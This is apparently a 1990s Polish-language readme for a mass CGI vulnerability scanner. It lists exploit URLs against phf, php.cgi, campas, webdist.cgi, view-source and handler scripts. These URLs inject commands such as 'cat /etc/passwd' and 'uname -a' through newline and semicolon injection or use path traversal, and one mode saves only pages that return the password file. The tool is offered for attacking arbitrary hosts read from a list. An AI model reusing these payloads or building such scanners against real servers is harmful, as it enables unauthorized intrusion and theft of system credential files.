home *** CD-ROM | disk | FTP | other *** search
- Czesc wszystkim...
-
-
- I. Program skanuje serwery pod wzgledem dziur php i phf:
-
- /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
- /cgi-bin/php.cgi?/etc/passwd
- /cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
- /cgi-bin/phf?Qalias=hell%0auname%20-a%0a
- /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
- /cgi-bin/campas?%0acat%0a/etc/passwd%0a
- /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
- /cgi-bin/view-source?../../../../../../../etc/passwd
-
- Ponadto istnieje mozliwosc wykorzystania innych,
- nie wymienionych dziur.
-
-
- II. Adresy do sprawdzenia pobiera pliku, ktory musi miec
- taka postac:
-
- [...]
- www.www.www.www
- aaa.aaa.aaa.aaa
- 123.123.123.123
- [...]
-
-
- III. Prog moze pracowac w 3 trybach:
-
- 1. Pobiera i zapisuje wszystkie sprawdzone
- strony bez wzgledu na ich zawartosc lub
- ewentualne bledy zwrocone przez serwer.
- 2. Pobiera i zapisuje tylko te strony, ktore
- nie zwroca bledu (bez wzgledu na ich tresc).
- 3. Zapisuje strony zawierajce plik passwd.
-
-
- IV. Pobrane strony sa zapisywane w wybranym katalogu
- w postaci:
-
- zzz.zzz.zzz.zzz_****.txt
-
- gdzie **** moze miec postac:
-
- phf1 dla /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
- php1 dla /cgi-bin/php.cgi?/etc/passwd
- phf2 dla /cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
- phf3 dla /cgi-bin/phf?Qalias=hell%0auname%20-a%0a
- wha1 dla /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
- cam1 dla /cgi-bin/campas?%0acat%0a/etc/passwd%0a
- web1 dla /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
- vie1 dla /cgi-bin/view-source?../../../../../../../etc/passwd
- man1 dla tego co wpiszesz
- man2 dla tego co wpiszesz
- man3 dla tego co wpiszesz
-
-
- V. Wyniki sa zapisywane w trakcie pracy w pliku
- "log_aaa.txt", ktory znajduje sie w tym samym
- katalogu co pobierane strony.
-
-
- To chyba wszystko...
- Nie bede opisywal co robi ten a co tamten
- przycisk bo to juz mozecie sami sprawdzic.
-
- Jezeli prog bedzie chodzil zle lub wcale to sorry
- ale to moj pierwszy program dzialajacy online.
- Mysle jednak ze wszystko przewidzialem i nie
- powinno byc problemu.
- Jedyny blad jaki znalazlem ma miejsce przy
- przerywaniu skanowania.
- A to dlatego ze prog przerywa dopiero wtedy
- gdy sprawdzi do konca dany host.
- Poprawie to w najblizszym czasie.
-
- Jesli masz jakies propozycje czy uwagi
- odnosnie skanera to daj znac.
-
- Pozdrowienia.
-
-
- -= natalis =-
- natalis@friko3.onet.pl
- Strange Connection